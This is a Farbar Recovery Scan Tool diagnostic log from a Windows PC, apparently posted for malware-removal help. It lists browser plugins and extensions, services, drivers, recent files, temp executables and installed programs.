FF Plugin: @nvidia.com/3DVisionStreaming - C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 - C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 - C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @zoom.us/ZoomVideoPlugin - C:\Users\MikeandBert\AppData\Roaming\Zoom\bin\npzoomplugin.dll (Zoom Video Communications, Inc.)
FF Extension: Lavasoft Search Plugin - C:\Users\MikeandBert\AppData\Roaming\Mozilla\Firefox\Profiles\icjdnhbo.default\Extensions\jid1-yZwVFzbsyfMrqQ@jetpack [2012-12-02]
FF HKLM\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\html5video
FF Extension: DivX Plus Web Player HTML5 &lt;video&gt; - C:\Program Files\DivX\DivX Plus Web Player\firefox\html5video [2011-05-06]
FF HKLM\...\Firefox\Extensions: [{6904342A-8307-11DF-A508-4AE2DFD72085}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\wpa
FF Extension: DivX HiQ - C:\Program Files\DivX\DivX Plus Web Player\firefox\wpa [2011-05-06]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG2012\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG2012\Firefox4 [2011-12-03]
FF HKLM\...\Firefox\Extensions: [{F53C93F1-07D5-430c-86D4-C9531B27DFAF}] - C:\Program Files\AVG\AVG2012\Firefox\DoNotTrack
FF Extension: AVG Do Not Track - C:\Program Files\AVG\AVG2012\Firefox\DoNotTrack [2012-05-15]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2013-12-23]

Chrome:
=======
CHR HomePage:
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\pdf.dll No File
CHR Plugin: (AVG Internet Security) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla\12.0.0.2210_0\plugins/avgnpss.dll (AVG Technologies CZ, s.r.o.)
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Java Deployment Toolkit 6.0.260.3) - C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll (Sun Microsystems, Inc.)
CHR Plugin: (Java™ Platform SE 6 U26) - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (npFFApi) - C:\Program Files\CheckPoint\ZAForceField\TrustChecker\bin\npFFApi.dll No File
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (DivX Web Player) - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
CHR Plugin: (Google Earth Plugin) - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.124\npGoogleUpdate3.dll No File
CHR Plugin: (Silverlight Plug-In) - C:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Unity Player) - C:\Users\MikeandBert\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll No File
CHR Plugin: (Windows Presentation Foundation) - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32_11_5_502_110.dll No File
CHR Extension: (Google Drive) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-12-27]
CHR Extension: (YouTube) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-12-27]
CHR Extension: (Google Search) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-12-27]
CHR Extension: (DivX HiQ) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjbmmemklcjgepojigaapkoodmkgbae [2012-12-27]
CHR Extension: (AVG Safe Search) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla [2012-12-27]
CHR Extension: (FBPHOTOZOOM) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpieaakhacmfleokhjcjnpcnmnmpfkid [2012-12-27]
CHR Extension: (AVG Do Not Track) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2012-12-27]
CHR Extension: (DivX Plus Web Player HTML5 video) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm [2012-12-27]
CHR Extension: (Gmail) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-12-27]
CHR HKLM\...\Chrome\Extension: [fnjbmmemklcjgepojigaapkoodmkgbae] - C:\Program Files\DivX\DivX Plus Web Player\google_chrome\wpa\wpa.crx [2011-02-07]
CHR HKLM\...\Chrome\Extension: [jmfkcklnlgedgbglfkkgedjfmejoahla] - C:\Program Files\AVG\AVG2012\Chrome\safesearch.crx [2012-07-26]
CHR HKLM\...\Chrome\Extension: [knkakpihealnpggeceajhaonlmgdkaip] - C:\Users\MIKEAN~1\AppData\Local\Temp\tbch.crx [2012-07-26]
CHR HKLM\...\Chrome\Extension: [mpieaakhacmfleokhjcjnpcnmnmpfkid] - C:\Program Files\fbphotozoom\fbphotozoom16.crx [2012-04-05]
CHR HKLM\...\Chrome\Extension: [ndibdjnfmopecpmkdieinmbadjfpblof] - C:\Program Files\AVG\AVG2012\Chrome\donottrack.crx [2012-04-20]
CHR HKLM\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files\DivX\DivX Plus Web Player\google_chrome\html5video\html5video.crx [2011-02-07]

========================== Services (Whitelisted) =================

R2 AVGIDSAgent; C:\Program Files\AVG\AVG2012\AVGIDSAgent.exe [5175856 2013-10-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2012\avgwdsvc.exe [193288 2012-02-14] (AVG Technologies CZ, s.r.o.)
S4 GameConsoleService; C:\Program Files\eMachines Games\eMachines Game Console\GameConsoleService.exe [165416 2008-05-05] (WildTangent, Inc.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [11736 2011-04-27] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [142176 2012-12-10] (AVG Technologies CZ, s.r.o. )
R3 AVGIDSFilter; C:\Windows\System32\DRIVERS\avgidsfilterx.sys [24144 2011-12-23] (AVG Technologies CZ, s.r.o. )
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [24896 2012-04-19] (AVG Technologies CZ, s.r.o. )
R3 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [17232 2011-12-23] (AVG Technologies CZ, s.r.o. )
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [250080 2012-11-08] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [41040 2011-12-23] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [31952 2012-01-31] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [302368 2013-04-11] (AVG Technologies CZ, s.r.o.)
S3 BVRPMPR5; C:\Windows\system32\drivers\BVRPMPR5.SYS [49904 2010-11-03] (Avanquest Software) [File not signed]
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [13560 2012-12-02] (GFI Software)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
R3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
S3 V0415Vid; C:\Windows\System32\DRIVERS\V0415Vid.sys [286208 2009-08-03] (Creative Technology Ltd.)
S1 CSN5PDTS82; System32\Drivers\CSN5PDTS82.sys [X]
S1 CSN5PDTS82x64; System32\Drivers\CSN5PDTS82x64.sys [X]
S1 dcohjryh; \??\C:\Windows\system32\drivers\dcohjryh.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-07-19 19:17 - 2014-07-19 19:17 - 00002341 _____ () C:\Users\MikeandBert\Desktop\Multiple dllhost.exe-Com Surrogate processes running - Virus, Trojan, Spyware, and Malware Removal Logs.url
2014-07-19 15:19 - 2014-07-19 15:19 - 00000000 ____D () C:\Windows\Temp965A39F0-D8D4-45F9-AB4E-7BAA80C34227-Signatures
2014-07-19 14:55 - 2014-07-20 12:20 - 00000000 ____D () C:\FRST
2014-07-19 14:52 - 2014-07-20 12:20 - 00000000 ____D () C:\Users\MikeandBert\Desktop\com fix
2014-07-08 22:44 - 2014-06-06 17:19 - 02051072 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-07-08 22:44 - 2014-06-06 17:05 - 12353024 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-07-08 22:44 - 2014-06-06 16:25 - 09711616 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-07-08 22:44 - 2014-06-06 16:12 - 01810432 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-07-08 22:44 - 2014-06-06 16:04 - 01106432 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-07-08 22:44 - 2014-06-06 16:03 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-07-08 22:44 - 2014-06-06 16:02 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-07-08 22:44 - 2014-06-06 16:00 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-07-08 22:44 - 2014-06-06 15:58 - 00065024 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-07-08 22:44 - 2014-06-06 15:57 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-07-08 22:44 - 2014-06-06 15:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-07-08 22:44 - 2014-06-06 15:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 01796096 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-07-08 22:44 - 2014-06-06 15:52 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-07-08 22:44 - 2014-06-06 15:51 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-07-08 22:44 - 2014-06-06 15:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-07-08 22:44 - 2014-06-06 01:59 - 00506880 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-07-08 22:44 - 2014-05-29 23:53 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-06-25 10:59 - 2014-06-25 10:59 - 00000000 ____D () C:\Users\MikeandBert\AppData\Local\Adobe

==================== One Month Modified Files and Folders =======

2014-07-20 12:20 - 2014-07-19 14:55 - 00000000 ____D () C:\FRST
2014-07-20 12:20 - 2014-07-19 14:52 - 00000000 ____D () C:\Users\MikeandBert\Desktop\com fix
2014-07-20 12:20 - 2011-11-16 02:59 - 00000896 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-07-20 12:19 - 2011-11-16 02:59 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-07-20 12:17 - 2013-04-18 22:02 - 00065536 _____ () C:\Windows\system32\Ikeext.etl
2014-07-20 12:17 - 2006-11-02 05:47 - 00003216 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-07-20 12:17 - 2006-11-02 05:47 - 00003216 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-07-20 12:16 - 2008-09-04 17:48 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-07-20 12:16 - 2006-11-02 06:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-07-20 11:50 - 2006-10-11 00:09 - 01731353 _____ () C:\Windows\WindowsUpdate.log
2014-07-20 11:32 - 2013-10-22 15:08 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-07-20 10:42 - 2011-12-03 17:34 - 00000000 ____D () C:\Windows\system32\Drivers\AVG
2014-07-20 10:28 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\tracing
2014-07-19 20:42 - 2006-11-02 06:01 - 00032590 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-07-19 19:17 - 2014-07-19 19:17 - 00002341 _____ () C:\Users\MikeandBert\Desktop\Multiple dllhost.exe-Com Surrogate processes running - Virus, Trojan, Spyware, and Malware Removal Logs.url
2014-07-19 15:33 - 2011-09-08 03:05 - 00002106 _____ () C:\Windows\epplauncher.mif
2014-07-19 15:19 - 2014-07-19 15:19 - 00000000 ____D () C:\Windows\Temp965A39F0-D8D4-45F9-AB4E-7BAA80C34227-Signatures
2014-07-17 23:53 - 2006-11-02 03:33 - 00762234 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-07-09 03:25 - 2006-11-02 05:47 - 00379856 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-07-09 03:24 - 2008-01-20 19:47 - 00203668 _____ () C:\Windows\PFRO.log
2014-07-09 03:21 - 2006-11-02 05:37 - 00000000 ____D () C:\Program Files\Windows Journal
2014-07-09 03:05 - 2013-08-14 03:14 - 00000000 ____D () C:\Windows\system32\MRT
2014-07-09 03:02 - 2006-11-02 03:24 - 93585272 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-07-08 11:28 - 2012-06-14 08:08 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-07-08 11:28 - 2011-10-16 04:39 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-07-08 06:20 - 2012-07-07 15:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-06-26 13:55 - 2014-05-03 14:30 - 00000000 ____D () C:\Users\MikeandBert\AppData\Roaming\Nikon
2014-06-26 13:55 - 2013-09-17 06:24 - 00000020 ____H () C:\ProgramData\PKP_DLev.DAT
2014-06-26 13:51 - 2013-05-24 19:59 - 00000000 ____D () C:\Users\MikeandBert\Desktop\bert
2014-06-25 10:59 - 2014-06-25 10:59 - 00000000 ____D () C:\Users\MikeandBert\AppData\Local\Adobe
2014-06-23 15:40 - 2009-04-09 11:34 - 00000000 ____D () C:\Users\MikeandBert\Desktop\Mike

Files to move or delete:
====================
C:\ProgramData\hash.dat

Some content of TEMP:
====================
C:\Users\MikeandBert\AppData\Local\Temp\621c1aa1-9b2a-44b7-b939-9195ece7f5a4.exe
C:\Users\MikeandBert\AppData\Local\Temp\9.0.0.2308SD_OCU_Online_9.0.0.2308.exe
C:\Users\MikeandBert\AppData\Local\Temp\a96808eb-cbfb-4bcb-9e18-4b4dd776c7a9.exe
C:\Users\MikeandBert\AppData\Local\Temp\InstallFlashPlayer.exe
C:\Users\MikeandBert\AppData\Local\Temp\nsvBD02.tmp.tbProd.dll
C:\Users\MikeandBert\AppData\Local\Temp\Uninstall.exe

==================== Bamital & volsnap Check =================

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-07-20 10:54

==================== End Of Log ============================

-----------------------------

Addition File:

Additional scan result of Farbar Recovery Scan Tool (x86) Version:20-07-2014
Ran by MikeandBert at 2014-07-20 12:21:45
Running from C:\Users\MikeandBert\Desktop\com fix
Boot Mode: Normal
==========================================================

==================== Security Center ========================

AV: Microsoft Security Essentials (Enabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Anti-Virus Free Edition 2012 (Enabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AS: AVG Anti-Virus Free Edition 2012 (Enabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
AS: Microsoft Security Essentials (Enabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.0.0.4080 - Adobe Systems Incorporated)
Adobe AIR (Version: 3.0.0.4080 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 14 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 14 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)
Agere Systems PCI-SV92EX Soft Modem (HKLM\...\Agere Systems Soft Modem) (Version:  - Agere Systems)
Apple Application Support (HKLM\...\{EB879750-CCBD-4013-BFD5-0294D4DA5BD0}) (Version: 2.1.7 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{A00B9A50-3090-4CFF-9CDA-82DA0BEDAA21}) (Version: 4.0.0.96 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Panorama Maker 6 (HKLM\...\{DABFD34E-BE68-4BC6-9254-5D7A7FF76B99}) (Version: 6.0.8.85 - ArcSoft)
Audacity 2.0 (HKLM\...\Audacity_is1) (Version:  - Audacity Team)
AVG 2012 (HKLM\...\AVG) (Version: 2012.1.2247 - AVG Technologies)
AVG 2012 (Version: 12.0.1873 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.1890 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.1901 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.2102 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.2176 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.2178 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.2197 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.2221 - AVG Technologies) Hidden
AVG 2012 (Version: 12.0.3955 - AVG Technologies) Hidden
AVG 2012 (Version: 12.1.2238 - AVG Technologies) Hidden
AVG 2012 (Version: 12.1.2240 - AVG Technologies) Hidden
AVG 2012 (Version: 12.1.2241 - AVG Technologies) Hidden
AVG 2012 (Version: 12.1.2242 - AVG Technologies) Hidden
AVG 2012 (Version: 12.1.2247 - AVG Technologies) Hidden
Camtasia (HKLM\...\Camtasia) (Version: 3.0 - TechSmith Corporation)
CDisplay 1.8 (HKLM\...\CDisplay_is1) (Version:  - dvd8n)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6425.1000 - Microsoft Corporation)
Creative Live! Cam Video IM Ultra (VF0415) (1.01.03.00) (HKLM\...\Creative VF0415) (Version:  - )
CyberLink LabelPrint (HKLM\...\{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.0.3111 - CyberLink Corp.)
CyberLink Power2Go (HKLM\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 5.5.4316 - CyberLink Corp.)
DivX Setup (HKLM\...\DivX Setup.divx.com) (Version: 2.5.0.8 - DivX, LLC)
eMachines Games (HKLM\...\WildTangent emachines Master Uninstall) (Version: 1.0.0.52 - WildTangent)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
FileZilla Client 3.5.3 (HKLM\...\FileZilla Client) (Version: 3.5.3 - FileZilla Project)
FLAC 1.2.1b (remove only) (HKLM\...\FLAC) (Version: 1.2.1b - Xiph.org)
Free WMA to MP3 Converter 1.16 (HKLM\...\Free WMA to MP3 Converter_is1) (Version:  - Jodix Technologies Ltd.)
FreeRIP v3.66 (HKLM\...\{501451DE-5808-4599-B544-8BD0915B6B24}_is1) (Version: 3.66 - GreenTree Applications SRL)
FUJIFILM FinePixViewer S Ver.2.1 (HKLM\...\{88B32652-CAE0-4909-A463-5840D2689D93}) (Version: 2.1.0.3 - FUJIFILM Corporation)
GearDrvs (Version: 1.00.0000 - GEAR Software) Hidden
Google Chrome (HKLM\...\Google Chrome) (Version: 36.0.1985.125 - Google Inc.)
Google Drive (HKLM\...\{75939021-3B68-419D-8DC1-E9823BFF9658}) (Version: 1.16.7009.9618 - Google, Inc.)
Google Earth (HKLM\...\{5A3C1721-F8ED-11E0-8AFB-B8AC6F97B88E}) (Version: 6.1.0.5001 - Google)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
iTunes (HKLM\...\{29ED20C9-5E15-4969-9279-25BF3727A3DA}) (Version: 10.5.0.142 - Apple Inc.)
Java™ 6 Update 26 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216013FF}) (Version: 6.0.260 - Sun Microsystems, Inc.)
Java™ 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)
LAME v3.99.3 (for Windows) (HKLM\...\LAME_is1) (Version:  - )
Malwarebytes Anti-Malware version 1.65.1.1000 (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version: 1.65.1.1000 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 2.0.181.2 - McAfee, Inc.)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
